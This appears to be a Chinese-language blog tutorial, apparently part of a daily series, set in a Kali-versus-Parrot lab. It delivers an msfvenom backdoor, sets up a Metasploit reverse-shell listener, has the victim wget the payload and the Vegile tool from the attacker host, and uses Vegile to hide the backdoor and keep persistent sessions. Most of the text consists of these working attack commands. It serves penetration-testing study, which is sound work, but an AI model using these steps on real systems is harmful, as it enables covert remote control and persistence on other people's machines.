哈囉~
昨天我們用msfvenom建立了一個後門,
將其傳送到受害端的主機,
只要受害端運行了該程式,
就會建立TCP連線,並自動連回我們的主機。
我們便可以透過連線來控制目標。
另外,也透過git clone把Vegile下載到電腦。
今天就來接續昨天的實作吧~
環境:
Kali ─ 攻擊方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)
將昨天的 後門 & Vegile 都移至/var/ww/html目錄下。
 cp backdoor /var/www/html
 cp -r Vegile /var/www/html


為了模擬從受害端連回去server下載工具,記得要啟動apache。
systemctl start apache2

接下來我們執行msf控制台,使用exploit/multi/handler開始監聽。
msfconsole
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set lhost [要連回的攻擊者ip]
set lport 777
run

wget [攻擊者ip]/Vegile
wget [攻擊者ip]/backdoor


 
Vegile --i backdoor時發現有錯誤...
 
 
chmod +x Vegile
chmod +x backdoor
 
./Vegile --i backdoor
 
 
Vegile這個工具的指令其實很簡單,
只有以下三個參數:
| 參數 | 說明 | 
|---|---|
| -i | 隱藏後門 | 
| -u | 開啟無限Session | 
| -h | 功能查詢 | 
走囉! 高歌離席~